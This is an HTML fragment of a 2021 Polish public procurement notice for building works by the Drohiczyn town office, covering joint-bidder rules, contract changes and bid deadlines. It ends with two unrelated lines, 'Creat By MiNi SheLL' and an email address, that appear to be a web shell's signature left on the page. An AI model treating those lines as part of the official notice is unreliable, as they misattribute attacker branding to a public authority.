należy załączyćdo oferty. 2.W<br/>przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,oświadczenia<br/>idokumenty potwierdzające brak podstaw do wykluczenia z postępowania składakażdy<br/>zWykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzająbrak<br/>podstaw wykluczenia. Oświadczenie o spełnianiu warunków udziału w zakresieskłada<br/>wykonawca, który wykazuje spełnienie warunków udziału wpostępowaniu.3.Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają dooferty oświadczenie, z którego<br/>wynika, które dostawy/usługi wykonają poszczególniwykonawcy.4.W odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej –spełnienie warunku wykazuje co najmniej<br/>jeden z Wykonawców wspólnie ubiegających się oudzielenie zamówienia – Zamawiający nie<br/>dopuszcza łącznego spełnienia warunku przezWykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty<br/>w zakresie uregulowanym w art. 454-455 pzp oraz w projektowanych postanowieniach umowy,<br/>stanowiących Załącznik nr 7.1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Miejski w Drohiczynie, ul. J. I. Kraszewskiego 5, 17-312 Drohiczyn Adres skrzynki podawczej ePUAP: /UMDrohiczyn/skrytka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-16 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com